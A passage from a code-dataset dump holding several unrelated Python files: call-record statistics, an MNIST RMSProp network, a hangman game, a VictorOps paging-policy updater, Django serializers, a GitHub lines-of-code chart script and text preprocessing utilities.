events1dfgrouped = eventi1.groupby(by=[\"timestamp\", \"X\", \"Y\", \"Z\"], as_index=False).sum()\n eventi1 = events1dfgrouped\n\n\ndef get_part_a_xy(x, y):\n eventsxy = eventi1[eventi1[\"X\"] == x]\n eventsxy = eventsxy[eventsxy[\"Y\"] == y]\n intervals = []\n\n if len(eventsxy) != 0:\n start = 0\n start_finestra = True\n prec = 0\n end = 0\n for i, row in eventsxy.iterrows():\n if start_finestra:\n start = row[\"timestamp\"]\n start_finestra = False\n if row[\"timestamp\"] > start + finestra:\n intervals.append((start, prec + finestra))\n start = row[\"timestamp\"]\n if i == len(eventsxy) - 1:\n end = row[\"timestamp\"]\n prec = row[\"timestamp\"]\n\n intervals.append((start, end + finestra))\n return intervals\n\n\ndef get_part_b_xy(partA, minT, maxT):\n intervals = []\n if len(partA) != 0:\n start = minT\n for item in partA:\n end = item[0] - 1\n intervals.append((start, end))\n start = item[1] + 1\n intervals.append((start, maxT))\n return intervals\n else:\n return [(minT, maxT)]\n\n\ndef get_p0(x, y, z):\n partB = partsXY[(x, y)][\"B\"]\n tabulato_yz = tabulato[tabulato[\"mittente\"] == y]\n tabulato_yz = tabulato_yz[tabulato_yz[\"destinatario\"] == z]\n tabulato_yz.reset_index(inplace=True, drop=True)\n c = 0\n for _, row in tabulato_yz.iterrows():\n timestamp = row[\"timestamp\"]\n for item in partB:\n if item[0] <= timestamp <= item[1]:\n c += 1\n break\n if timestamp < item[0]:\n break\n return c / len(tabulato) # TODO: togliere filtro\n\n\ndef get_p_cappuccio(x, y, z):\n eventsxy = eventi1[eventi1[\"X\"] == x]\n eventsxy = eventsxy[eventsxy[\"Y\"] == y]\n eventsxy.reset_index(inplace=True, drop=True)\n eventsxyz = eventsxy[eventsxy[\"Z\"] == z]\n eventsxyz.reset_index(inplace=True, drop=True)\n return eventsxyz[\"chiamate\"].sum() / eventi1[\"chiamate\"].sum() # TODO? su tutti gli eventi\n\n\ndef calcolo_p0_p_hat():\n global tabulato\n minT = tabulato[\"timestamp\"].min()\n maxT = tabulato[\"timestamp\"].max()\n tabulato = tabulato[tabulato[\"is_mittente_intercettato\"] == \"S\"]\n tabulato = tabulato[tabulato[\"is_destinatario_intercettato\"] == \"S\"]\n tabulato_coppie = tabulato\n tabulato_coppie = tabulato_coppie.drop(\n columns=[\"timestamp\", \"durata\", \"is_mittente_intercettato\", \"mittente_cella_start\", \"mittente_cella_end\",\n \"is_destinatario_intercettato\", \"destinatario_cella_start\", \"destinatario_cella_end\", \"esito_chiamata\",\n \"tipo\"])\n tabulato_coppie.drop_duplicates(inplace=True)\n tabulato_coppie.reset_index(inplace=True, drop=True)\n for i, row in tabulato_coppie.iterrows():\n x = row[\"mittente\"]\n y = row[\"destinatario\"]\n partsXY[(x, y)] = {}\n partsXY[(x, y)][\"A\"] = get_part_a_xy(x, y)\n partsXY[(x, y)][\"B\"] = get_part_b_xy(partsXY[(x, y)][\"A\"], minT, maxT)\n p0 = []\n p_cappuccio = []\n for i, row in eventi1.iterrows():\n x = row[\"X\"]\n y = row[\"Y\"]\n z = row[\"Z\"]\n p0.append(get_p0(x, y, z))\n p_cappuccio.append(get_p_cappuccio(x, y, z))\n eventi1[\"p0\"] = p0\n eventi1[\"p_cappuccio\"] = p_cappuccio\n eventi1.to_csv(\"data/events1_sign.csv\", index=False)\n\n\ndef n_chiamate_xy():\n global tabulato\n tabulato_coppie = tabulato\n tabulato_coppie = tabulato_coppie.drop(\n columns=[\"timestamp\", \"durata\", \"is_mittente_intercettato\", \"mittente_cella_start\", \"mittente_cella_end\",\n \"is_destinatario_intercettato\", \"destinatario_cella_start\", \"destinatario_cella_end\", \"esito_chiamata\",\n \"tipo\"])\n tabulatof = tabulato_coppie.groupby(tabulato_coppie.columns.tolist()).size().reset_index().rename(\n columns={0: 'n_telefonate'})\n for i, row in tabulatof.iterrows():\n # partsXY[(row[\"mittente\"], row[\"destinatario\"])] = {}\n partsXY[(row[\"mittente\"], row[\"destinatario\"])][\"n_telefonate\"] = row['n_telefonate']\n return\n\n\ndef calcolo_z():\n eventi_p = pd.read_csv(\"data/events1_sign.csv\")\n z = []\n for i, row in eventi_p.iterrows():\n p_hat = row[\"p_cappuccio\"]\n p0 = row[\"p0\"] # if row[\"p0\"] != 0 else zero_probability_factor\n n = partsXY[(row[\"X\"], row[\"Y\"])][\"n_telefonate\"]\n root = math.sqrt((p0 * (1 - p0)) / n)\n z.append((p_hat - p0) / root)\n eventi_p[\"z\"] = z\n eventi_p.to_csv(\"data/events1_sign.csv\", index=False)\n\n return\n\n\ndef calcolo_sign():\n eventi_z = pd.read_csv(\"data/events1_sign.csv\")\n sign = []\n for i, row in eventi_z.iterrows():\n p = 1 - norm.cdf(row[\"z\"])\n sign.append(p)\n eventi_z[\"significativo\"] = sign\n eventi_z.to_csv(\"data/events1_sign.csv\", index=False)\n return\n\n\nif __name__ == \"__main__\":\n print(\"Inizio\")\n group_e1()\n calcolo_p0_p_hat()\n n_chiamate_xy()\n calcolo_z()\n calcolo_sign()\n print(\"Fine\")\n","sub_path":"window_43200/events1_sign.py","file_name":"events1_sign.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"507259960","text":"import numpy as np\nimport random\nimport time\nfrom mnist import MNIST\n\ndef loadData():\n mndata = MNIST('../mnist-data')\n mndata.gz = True\n trainData = mndata.load_training()\n testData = mndata.load_testing()\n return trainData, testData\ndef loadDataWrapper():\n trd, ted = loadData()\n trainInputs = [np.reshape(x,(784,1)) for x in trd[0]]\n trainInputs = np.multiply((1.0/255.0),np.array(trainInputs))\n trainResults = [vectorizedResult(y) for y in trd[1]]\n trainData = list(zip(trainInputs, trainResults))\n testInputs = [np.reshape(x,(784,1)) for x in ted[0]]\n testInputs = np.multiply((1.0/255.0),np.array(testInputs))\n testData = list(zip(testInputs,ted[1]))\n return trainData,testData\ndef vectorizedResult(i):\n e = np.zeros((10,1))\n e[i] = 1.0\n return e\n\ndef testWrapper(func, args):\n return func(args)\n\ndef sigmoid(z):\n return 1.0/(1.0+np.exp(-z))\ndef sigmoidPrime(z):\n return(sigmoid(z)*(1-sigmoid(z)))\n\neps = 1e-8\n\nclass Network():\n def __init__(self, layers):\n #### Initialize weight and bias arrays with random values\n self.numLayers = len(layers)\n self.layers = layers\n self.biases = [np.random.randn(y,1) for y in layers[1:]]\n self.weights = [np.random.randn(y,x) for x,y in zip(\n layers[:-1],layers[1:])]\n #### Arrays used for rolling cost accumulation\n self.eRho = np.array([0.02,0.08,0.3,0.6])\n self.ePast = [[np.array([np.zeros(y)]).T for x in range(4)] \\\n for y in layers[1:]]\n self.grads = [[np.array([np.zeros(y)]).T for x in range(4)] \\\n for y in layers[1:]]\n \n def __del__(self):\n print(\"Deleted Network\")\n \n def FeedForward(self,a):\n for b,w in zip(self.biases,self.weights):\n a = sigmoid(np.dot(w,a)+b)\n return a\n \n def Backprop(self, x, y):\n #### Initialize delta vectors for bias/weight with zeros.\n deltaB = [np.zeros(b.shape) for b in self.biases]\n deltaW = [np.zeros(w.shape) for w in self.weights]\n #### Feed Forward z^l=w^l a^(l-1) + b^l and a^l=sig(z^l)\n activation = x\n activations = [x]\n zs = []\n for b,w in zip(self.biases,self.weights):\n z = np.dot(w,activation)+b\n zs.append(z)\n activation = sigmoid(z)\n activations.append(activation)\n #### Calculate Error E^l=delta_a C * sigprime(z^L)\n gradient= activations[-1]-y\n self.updateErrors(gradient, self.numLayers-2)\n delta = gradient*sigmoidPrime(zs[-1])\n deltaB[-1] = delta\n deltaW[-1] = np.dot(delta,activations[-2].T)\n #### Backpropagate Error\n for i in reversed(range(0,self.numLayers-2)):\n #### Calculate E^l=((w^(l+1)^T E^(l+1)) * sigprime(z^l))\n delta = np.dot(self.weights[i+1].T,delta)*sigmoidPrime(zs[i])\n #### Calculate dC/dw_jk^l = a_k^(l-1) E_j^l and dC/db_j^l = E_j^l\n deltaB[i] = delta\n deltaW[i] = np.dot(activations[i+1].T,delta)\n self.updateErrors(deltaW[i], i)\n return(deltaB,deltaW)\n\n def RMSProp(self, trainData, epochs, miniBatchSize, alpha, testData=None):\n n = len(trainData)\n #### Repeat train process for number of epochs specified\n for i in range(1, epochs+1):\n random.shuffle(trainData)\n miniBatches = [trainData[x:x+miniBatchSize] \\\n for x in range(0,n,miniBatchSize)]\n #### Calculate minibatch gradients\n for miniBatch in miniBatches:\n self.getMiniBatchGradient(miniBatch, alpha)\n \n #### If testData is passed in, forward pass and compare results then print\n if testData:\n nTest = len(testData)\n tempEval = self.evaluate(testData)\n print(\"Epoch {0}: {1} / {2}\".format(i, tempEval, nTest))\n else:\n print(\"Epoch {0} complete\".format(i))\n \n def updateErrors(self, gradient, layer):\n self.ePast[:-1] = self.ePast[1:];\n self.ePast[layer][-1] = np.multiply(0.9,self.ePast[layer][-1]) + \\\n np.multiply(0.1,gradient**2)\n self.ePast[layer][-1] = np.array([np.multiply(np.array( \\\n self.ePast[layer]).T[0],self.eRho).T.sum(axis=0)]).T\n \n self.grads[:-1] = self.grads[1:];\n self.grads[layer][-1] = gradient\n self.grads[layer][-1] = np.array([np.multiply(np.array( \\\n self.grads[layer]).T,self.eRho).T.sum(axis=0)]).T\n \n def evaluate(self, testData):\n res = [(np.argmax(self.FeedForward(x)),y) for x,y in testData]\n return sum(int(x==y) for x,y in res)\n \n def getMiniBatchGradient(self, miniBatch, alpha):\n nBiases = [np.zeros(b.shape) for b in self.biases]\n nWeights = [np.zeros(w.shape) for w in self.weights]\n\n for x,y in miniBatch:\n dnBiases,dnWeights = self.Backprop(x,y)\n\n nBiases = [nb+dnb for nb,dnb in zip(nBiases,dnBiases)]\n nWeights = [nw+dnw for nw,dnw in zip(nWeights,dnWeights)]\n self.weights = [w-np.multiply(alpha,g[-1])/np.sqrt(e[-1]+eps) \\\n for w,g,e in zip(self.weights,self.grads,self.ePast)]\n self.biases = [b-(alpha/len(miniBatch))*nb\n for b, nb in zip(self.biases, nBiases)]\n \n \n \n \ntrainData, testData = loadDataWrapper()\nnet = Network([784,35,15,20,10])\nnet.RMSProp(trainData[:5000], 30, 15, 0.001, testData[:500])","sub_path":"Spring 2018/Design and Analysis of Algorithms/Research Project/Testing/CustomFull.py","file_name":"CustomFull.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"292197694","text":"'''\nCreated on Thu Feb 13 10:40:09 2020\n\n@author: starstorms\n'''\nimport urllib.request as request\nimport random as rn\n\nclass hangPerson() :\n def __init__(self, max_attempts) :\n self.words = self.Word()\n self.max_attempts = max_attempts\n self.guesses = []\n \n def reset(self) :\n self.guesses = []\n self.words.chooseNewSecret()\n \n def playMutli(self) :\n while True :\n self.playGame()\n playAgain = input('Want to play again? [y/n]')\n if (playAgain.lower() == 'y') :\n self.reset()\n continue\n else:\n print('Goodbye!')\n break\n \n def playGame(self) :\n while True :\n self.showGame()\n guess = self.getInput()\n self.guesses.append(guess)\n won, game_over = self.checkWin()\n if (won) :\n print('You won!')\n return\n if (game_over) :\n print('You lost! Secret word was: {}'.format(self.words.secretWord))\n return\n \n def getInput(self) :\n while True:\n guess = input('What is your guess? ')\n if (guess.isalpha() and len(guess)==1) :\n if (guess in self.guesses) :\n print('Already guessed {}. Try again'.format(guess))\n print('So far you have guessed: {}'.format(sorted(self.guesses)))\n continue\n \n if (guess in self.words.secretWord) :\n print('\\nLucky guess, {} is in the secret word'.format(guess))\n else :\n print('\\nBad guess, {} is not in the secret word'.format(guess))\n \n return guess.lower()\n else:\n print('Invalid input, try again.')\n \n def checkWin(self) :\n won = True\n for sc in self.words.secretWord :\n if (not sc in self.guesses) :\n won = False\n break\n \n return won, (self.gotWrong() >= self.max_attempts)\n \n def gotWrong(self) :\n wrong = 0\n for g in self.guesses :\n if (not g in self.words.secretWord) :\n wrong += 1\n return wrong\n \n def showGame(self) :\n print('\\n')\n for c in self.words.secretWord :\n print(' ' + c if c in self.guesses else ' _', end='')\n print('\\nYou have {} guesses remaining.'.format(self.max_attempts - self.gotWrong()))\n \n class Word() :\n def __init__(self) :\n self.all_words = ['hello', 'break', 'noppe'] # self.getWords()\n self.chooseNewSecret()\n \n def getWords(self) :\n self.target_url = \"https://www.norvig.com/ngrams/sowpods.txt\"\n data = request.urlopen(self.target_url)\n words = list()\n for word in data:\n words.append(word.decode(\"utf-8\").strip())\n \n def chooseNewSecret(self) :\n self.secretWord = rn.choice(self.all_words)\n \n#%%\nhp = hangPerson(4)\nhp.playGame()","sub_path":"hangperson/Tyler_Habowski_Hangperson_V1.py","file_name":"Tyler_Habowski_Hangperson_V1.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"76460264","text":"#!/usr/bin/python\nimport requests, json, time\n\n#DEFINE PAGING POLICY\n\npolicy = {\n \"steps\": [\n {\n\t\t \"index\": 0,\n\t\t \"timeout\": 5,\n\t\t \"rules\": [\n\t\t {\n\t\t \"index\": 0,\n\t\t \"type\": \"phone\"\n\t\t },\n\t\t {\n\t\t \t\"index\": 1,\n\t\t \t\"type\": \"email\" # defaults to push if not activated\n\t\t },\n\t\t {\n\t\t \t\"index\": 2,\n\t\t \t\"type\": \"push\"\n\t\t },\n\t\t {\n\t\t \t\"index\": 3,\n\t\t \t\"type\": \"sms\"\n\t\t }\n\t\t ]\n\t\t},\n\t\t{\n\t\t\t\"index\": 1,\n\t\t \"timeout\": 10,\n\t\t \"rules\": [\n\t\t {\n\t\t \"index\": 0,\n\t\t \"type\": \"sms\"\n\t\t },\n\t\t {\n\t\t \t\"index\": 1,\n\t\t \t\"type\": \"phone\"\n\t\t }\n\t\t ]\n\t\t},\n\t\t{\n\t\t\t\"index\": 2,\n\t\t \"timeout\": 15,\n\t\t \"rules\": [\n\t\t {\n\t\t \"index\": 0,\n\t\t \"type\": \"push\"\n\t\t },\n\t\t {\n\t\t \t\"index\": 1,\n\t\t \t\"type\": \"email\" # defaults to push if not activated\n\t\t }\n\t\t ]\n\t\t}\n ]\n}\n\n#static urls\nuserPpUrl = \"https://api.victorops.com/api-public/v1/profile/\"\n\n#Update API Credentials\nheadersPub = {\n\t 'Content-type': \"application/json\",\n\t 'X-VO-Api-Id': '[API ID]',\n\t 'X-VO-Api-Key': '[API KEY]',\n\t 'cache-control': \"no-cache\",\n\t }\n\ndef getUsers():\n\t#no rate limit check as this call is only made once\n\tres = requests.request(\"GET\", 'https://api.victorops.com/api-public/v1/user', headers=headersPub)\n\tres.json()\n\treturn json.loads(res.text)['users'][0]\n\ndef clearPp(user):\n\t#set timer for rate limit\n\tt = time.process_time()\n\n\t# print user['pagingPolicy']\n\n\t#create copy of new dict to return at the end\n\tnewPolicy = dict(user['pagingPolicy'])\n\n\t#for each step in policy\n\tfor step in reversed(user['pagingPolicy']['steps']):\n\t\ts = step['index']\n\t\tfor rule in reversed(step['rules']):\n\t\t\t#get step and \n\t\t\tr = rule['index']\n\n\t\t\t#can't delete rule zero and step zero of policy, leave it there\n\t\t\tif r + s == 0:\n\t\t\t\tbreak\n\n\t\t\t#define url\n\t\t\turl = userPpUrl + user['username'] + \"/policies/\" + str(s) + \"/\" +str(r)\n\n\t\t\t#make DELETE request\n\t\t\tresponse = requests.request(\"DELETE\", url, headers=headersPub)\n\n\t\t\t#handle rate limits\n\t\t\twhile response.status_code == 403:\n\t\t\t\t#wait until minute has passed\n\t\t\t\twait = t + 5 - time.process_time()\n\t\t\t\tprint('waiting ', str(wait), 'seconds. . .')\n\t\t\t\ttime.sleep(wait)\n\t\t\t\t#reset timer to current time\n\t\t\t\tt = time.process_time()\n\n\t\t\t\t#retry\n\t\t\t\tresponse = requests.request(\"GET\", url, headers=headersPub)\n\n\t\t\t#if success, update return policy\n\t\t\tif response.status_code == 200:\n\t\t\t\t#update policy\n\t\t\t\tdel newPolicy['steps'][s]['rules'][r]\n\t\t\n\t\t\t#NON-RATE LIMIT FAILURE\n\t\t\telse:\n\t\t\t\tprint(user['username'] + ' - Failed to delete rule ' + r + 'of step ' + s + '. - ' + str(response.status_code))\n\t\t\t\tprint(str(response.text) + '\\n----------\\n')\n\t\t#update return policy\n\t\tdel newPolicy['steps'][s]\n\t#return copy of new policy to update user\n\treturn newPolicy\n\ndef setUserPp(user, policy):\n\n\tfor step in policy['steps']:\n\t\t#first step needs a PUT\n\t\tif step['index'] == 0:\n\t\t\tputPpStep(user, policy['steps'][0])\n\n\t\t#if more than one step, post them as new steps.\n\t\telse:\n\t\t\tpostPpStep(user, step)\n\n\ndef putPpStep(user, step):\n\n\t#start timer\n\tt=time.process_time()\n\t\n\turl = userPpUrl + user['username'] + \"/policies/0\"\n\n\t#build payload\n\tpayload = buildUserStep(user, step)\n\n\tresponse = requests.request(\"PUT\", url, data=json.dumps(step), headers=headersPub)\n\n\t#RATE LIMITS\n\twhile response.status_code == 403:\n\t\t#wait until minute has passed\n\t\twait = t + 5 - time.process_time()\n\t\tprint('waiting ', str(wait), 'seconds. . .')\n\t\ttime.sleep(wait)\n\t\t#reset timer to current time\n\t\tt = time.process_time()\n\n\t\t#retry\n\t\tresponse = requests.request(\"PUT\", url, data=json.dumps(payload), headers=headersPub)\n\n\tif response.status_code == 200:\n\t\t#return list of usernames\n\t\tuser['pagingPolicy']['steps'] += step\n\t\tprint(user['username'] + ' - 200 - first policy step set.')\n\t\treturn response.status_code\n\n\telse:\n\t\tprint(step)\n\t\tprint(url)\n\t\tprint(response.text)\n\t\tprint(response.status_code)\n\t\treturn False\n\ndef postPpStep(user, step):\n\t#stat timer\n\tt=time.process_time()\n\n\tpayload = buildUserStep(user, step)\n\n\turl = userPpUrl + user['username'] + \"/policies\"\n\n\tresponse = requests.request(\"POST\", url, data=json.dumps(step), headers=headersPub)\n\n\t#RATE LIMITS\n\twhile response.status_code == 403:\n\t\t#wait until minute has passed\n\t\twait = t + 5 - time.process_time()\n\t\tprint('waiting ', str(wait), 'seconds. . .')\n\t\ttime.sleep(wait)\n\t\t#reset timer to current time\n\t\tt = time.process_time()\n\n\t\t#retry\n\t\tresponse = requests.request(\"POST\", url, data=json.dumps(step), headers=headersPub)\n\n\tif response.status_code == 200:\n\t\t#return list of usernames\n\t\tprint(user['username'] + ' - 200 - policy step [' + str(step['index']) + '] set.') \n\t\tuser['pagingPolicy']['steps'] += step\n\t\t\n\t#NON-RATE LIMIT FAILURE\n\telse:\n\t\tprint(user['username'] + ' - Failed to post paging policy - ' + str(response.status_code) + '\\n----------\\n')\n\t\tprint(response.text)\n\t\tprint(step)\n\ndef buildUserStep(user, step):\n\t#This function crafts the user-specific paging policy step to include the first \n #\t{\n # \"index\": 0,\n # \"timeout\": 15,\n # \"rules\": [\n # {\n # \"index\": 0,\n # \"type\": \"push\"\n # }\n # ]\n # }\n\tpayload = dict(step)\n\tdel payload['index']\n\tfor rule in payload['rules']:\n\t\t#check to verify that user actually has a phone number as their contact methods.\n\t\tif (rule['type'] == 'sms' or rule['type'] == 'phone') and (len(user['contactMethods']['phones']['contactMethods']) > 0):\n\t\t\t#there is a phone number in the user profile, but is it verified?\n\t\t\tfor number in user['contactMethods']['phones']['contactMethods']:\n\t\t\t\tif number['verified'] == 'verified':\n\t\t\t\t\trule['contact'] = {\n\t\t\t\t\t\t'type': 'Phone',\n\t\t\t\t\t\t'id': user['contactMethods']['phones']['contactMethods'][0]['id']\n\t\t\t\t\t}\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tprint(user['username'] + ' - ' + number['value'] + ' is not verified, defaulting to email.')\n\t\t\t\t\trule['type'] = \"email\"\n\t\t\t\t\trule['contact'] = {\n\t\t\t\t\t\t'type': 'email',\n\t\t\t\t\t\t'id': user['contactMethods']['emails']['contactMethods'][0]['id']\n\t\t\t\t\t}\n\t\t#if type is email or there are no phone numbers present default to email\n\t\telif rule['type'] == 'email' or ((rule['type'] == 'sms'or rule['type'] == 'phone') and (len(user['contactMethods']['phones']['contactMethods']) == 0)):\n\t\t\t#if email is not verified, default to push\n\t\t\tif len(user['contactMethods']['phones']['contactMethods']) == 0:\n\t\t\t\tprint(user['username'] + ' - no phone number is present, defaulting to email.') \n\t\t\tfor email in user['contactMethods']['emails']['contactMethods']:\n\t\t\t\tif email['verified'] == 'verified':\n\t\t\t\t\trule['contact'] = {\n\t\t\t\t\t\t'type': 'email',\n\t\t\t\t\t\t'id': user['contactMethods']['emails']['contactMethods'][0]['id']\n\t\t\t\t\t}\n\t\t\t\t#if the email is not verified, default to push\n\t\t\t\telse:\n\t\t\t\t\tprint(user['username'] + ' - ' + email['value'] + ' is not verified, defaulting to push.')\n\t\t\t\t\trule['type'] = 'push'\n\t\t#this would be for a push, shouldn't need to add a contact id, since it goes to all devices\n\t\telse:\n\t\t\tprint('should be a push')\n\t\t\tpass\n\treturn payload\n\ndef getContactMethods(user):\n\tt = time.process_time()\n\n\turl = \"https://api.victorops.com/api-public/v1/user/\" + user['username'] + \"/contact-methods\"\n\n\tresponse = requests.request(\"GET\", url, headers=headersPub)\n\n\t#RATE LIMITS\n\twhile response.status_code == 403:\n\t\t#wait until minute has passed\n\t\twait = t + 5 - time.process_time()\n\t\tprint('waiting ', str(wait), 'seconds. . .')\n\t\ttime.sleep(wait)\n\t\t#reset timer to current time\n\t\tt = time.process_time()\n\n\t\t#retry\n\t\tresponse = requests.request(\"GET\", url, headers=headersPub)\n\n\tif response.status_code == 200:\n\t\t#return list of usernames\n\t\treturn json.loads(response.text)\n\t\t\n\t#NON-RATE LIMIT FAILURE\n\telse:\n\t\tprint(user['username'] + ' - Failed to retrieve contactMethods - ' + str(response.status_code) + '\\n----------\\n')\n\t\tprint(response.text)\n\ndef getUserPolicy(user):\n\tt = time.process_time()\n\n\turl = userPpUrl + user['username'] + '/policies'\n\n\tresponse = requests.request(\"GET\", url, headers=headersPub)\n\n\t#RATE LIMITS\n\twhile response.status_code == 403:\n\t\t#wait until minute has passed\n\t\twait = t + 5 - time.process_time()\n\t\tprint('waiting ', str(wait), 'seconds. . .')\n\t\ttime.sleep(wait)\n\t\t#reset timer to current time\n\t\tt = time.process_time()\n\n\t\t#retry\n\t\tresponse = requests.request(\"GET\", url, headers=headersPub)\n\n\tif response.status_code == 200:\n\t\t#return list of usernames\n\t\tpolicy = json.loads(response.text)\n\t\tdel policy['_selfUrl']\n\t\treturn policy\n\t\t\n\t#NON-RATE LIMIT FAILURE\n\telse:\n\t\tprint(user['username'] + ' - Failed to retrieve pagingPolicy - ' + str(response.status_code))\n\t\tprint(str(response.text) + '\\n----------\\n')\n\ndef main():\n\t#get all the users\n\tusers = getUsers()\n\n\t#attach contact methods and existing policy to all users\n\tfor user in users:\n\t\tuser['contactMethods'] = getContactMethods(user)\n\t\tuser['pagingPolicy'] = getUserPolicy(user)\n\t\t#print '\\t' + user['username'] + ' contact and paging information retrieved.'\n\n\t#print users\n\n\t#clear existing paging policies\n\tfor user in users:\n\t\tuser['pagingPolicy'] = clearPp(user)\n\t\t#print '\\t' + user['username'] + ' paging policy cleared.'\n\n\t#set template policy for all users\n\tfor user in users:\n\t\tsetUserPp(user, policy)\n\t\t#print '\\t' + user['username'] + ' paging policy set.'\n \nif __name__== \"__main__\":\n\tmain()\n","sub_path":"pagingPolicyTemplate.py","file_name":"pagingPolicyTemplate.py","file_ext":"py","file_size_in_byte":9470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"629218787","text":"import tensorflow as tf\nimport numpy as np\n\ndata = np.array([0.1, 0.2])\nx = tf.placeholder(\"float\", shape=[2])\nT1 = tf.Variable(tf.ones([2,2]))\nl1 = tf.matmul(T1, tf.expand_dims(x, 1))\ninit = tf.initialize_all_variables()\n\nwith tf.Session() as sess:\n sess.run(init)\n sess.run(l1, feed_dict={x: data})","sub_path":"SFData/ICSE2020/s34908033_ground_truth.py","file_name":"s34908033_ground_truth.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"638631861","text":"import datetime\n\nfrom djcustomrest.serializers.custom_datetime import serialize_datetime\n\n\ndef serialize_model(model):\n \"\"\"\n\n :type model: models.Model\n \"\"\"\n serialized_model = {}\n for field in model._meta.fields:\n value = getattr(model, field.attname, None)\n if type(value) is not datetime.datetime:\n serialized_model[field.attname] = getattr(model, field.attname,\n None)\n else:\n serialized_model[field.attname] = serialize_datetime(\n getattr(model, field.attname, None)\n )\n return serialized_model\n\n\ndef serialize_qs(qs):\n return list(map(serialize_model, qs))\n\n\ndef serialize_foo(foo):\n result = serialize_model(foo)\n result['bars'] = list(map(serialize_model, foo.bars.all()))\n return result\n\ndef serialize_foo_qs(qs):\n return list(map(serialize_foo, qs))\n","sub_path":"djcustomrest/serializers/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"51019497","text":"import re\nimport os\nimport base64\nimport requests\nfrom github import Github, InputGitAuthor\nimport datetime\nfrom string import Template\nimport matplotlib.pyplot as plt\nfrom io import StringIO, BytesIO\nfrom dotenv import load_dotenv\nimport time\n\nfrom make_bar_graph import BarGraph\n\n\nclass LinesOfCode:\n\n def __init__(self, id, username, ghtoken, repositoryData):\n self.id = id\n self.username = username\n\n self.g = Github(ghtoken)\n self.headers = {\"Authorization\": \"Bearer \" + ghtoken}\n self.repositoryData = repositoryData\n\n def calculateLoc(self):\n result = self.repositoryData\n yearly_data = {}\n for repo in result['data']['user']['repositories']['edges']:\n self.getCommitStat(repo['node'], yearly_data)\n time.sleep(0.7)\n return yearly_data\n\n def plotLoc(self, yearly_data):\n graph = BarGraph(yearly_data)\n graph.build_graph()\n self.pushChart()\n\n def run_query_v3(self, endPoint):\n # print(endPoint)\n request = requests.get(endPoint, headers=self.headers)\n if request.status_code == 401:\n raise Exception(\"Invalid token {}.\".format(request.status_code))\n elif request.status_code == 204:\n return []\n else:\n return request.json()\n\n def getQuarter(self, timeStamp):\n month = datetime.datetime.fromisoformat(timeStamp).month\n if month >= 1 and month <= 3:\n return 1\n elif month >= 4 and month <= 6:\n return 2\n elif month >= 7 and month <= 9:\n return 3\n elif month >= 10 and month <= 12:\n return 4\n\n def getCommitStat(self, repoDetails, yearly_data):\n commitsURL = 'https://api.github.com/repos/' + repoDetails['nameWithOwner'] + '/commits'\n filteredCommitsEndPoint = commitsURL + '?author=' + self.username\n filteredCommitsResult = self.run_query_v3(filteredCommitsEndPoint)\n # This ignores the error message you get when you try to list commits for an empty repository\n if not type(filteredCommitsResult) == list:\n return\n this_year = datetime.datetime.utcnow().year\n\n for i in range(len(filteredCommitsResult)):\n iso_date = filteredCommitsResult[i][\"commit\"][\"author\"][\"date\"]\n date = re.search(r'\\d+-\\d+-\\d+', iso_date).group(0)\n curr_year = datetime.datetime.fromisoformat(date).year\n # if curr_year != this_year:\n\n individualCommitEndPoint = commitsURL + '/' + filteredCommitsResult[i][\"sha\"]\n individualCommitResult = self.run_query_v3(individualCommitEndPoint)\n\n quarter = self.getQuarter(date)\n if repoDetails['primaryLanguage'] is not None:\n\n if curr_year not in yearly_data:\n yearly_data[curr_year] = {}\n if quarter not in yearly_data[curr_year]:\n yearly_data[curr_year][quarter] = {}\n if repoDetails['primaryLanguage']['name'] not in yearly_data[curr_year][quarter]:\n yearly_data[curr_year][quarter][repoDetails['primaryLanguage']['name']] = 0\n yearly_data[curr_year][quarter][repoDetails['primaryLanguage']['name']] += individualCommitResult[\"stats\"][\"additions\"]\n\n # to find total\n\n # if 'total' not in yearly_data[curr_year]:\n # yearly_data[curr_year]['total']={}\n # if repoDetails['primaryLanguage']['name'] not in yearly_data[curr_year]['total']:\n # yearly_data[curr_year]['total'][repoDetails['primaryLanguage']['name']]=0\n # yearly_data[curr_year]['total'][repoDetails['primaryLanguage']['name']]+=(result[i][1]+result[i][2])\n\n def pushChart(self):\n repo = self.g.get_repo(f\"{self.username}/{self.username}\")\n committer = InputGitAuthor('readme-bot', '41898282+github-actions[bot]@users.noreply.github.com')\n with open('bar_graph.png', 'rb') as input_file:\n data = input_file.read()\n try:\n contents = repo.get_contents(\"charts/bar_graph.png\")\n repo.update_file(contents.path, \"Charts Updated\", data, contents.sha, committer=committer)\n except Exception as e:\n repo.create_file(\"charts/bar_graph.png\", \"Charts Added\", data, committer=committer)\n","sub_path":"loc.py","file_name":"loc.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351965281","text":"import re\r\nimport os\r\nfrom glob import glob\r\nfrom textblob import TextBlob\r\nfrom nltk.corpus import stopwords\r\nfrom nltk import download\r\nfrom tqdm import tqdm\r\n\r\ndef download_preprocessing_prerequisites():\r\n \"\"\"Downloads the NLTK prerequisites needed for other functions\"\"\"\r\n download(\"averaged_perceptron_tagger\") # POS Tags\r\n download(\"stopwords\") # Stop words\r\n download(\"brown\") # Noun phrases\r\n download(\"punkt\") # Noun phrases\r\n\r\n\r\ndef text_blob_from_file(file_path):\r\n \"\"\"Loads a `TextBlob` from `file_path`\"\"\"\r\n with open(file_path, \"r\", encoding=\"utf-8\") as text_file:\r\n return TextBlob(text_file.read())\r\n\r\n\r\ndef remove_stop_words(text_blob):\r\n \"\"\"Removes all stop words from `text_blob` and returns the resulting `TextBlob`\"\"\"\r\n # Get words from original text, remove the stop words and combine the\r\n # words again\r\n words = text_blob.words\r\n\r\n stop_words = [stop_word.lower()\r\n for stop_word in 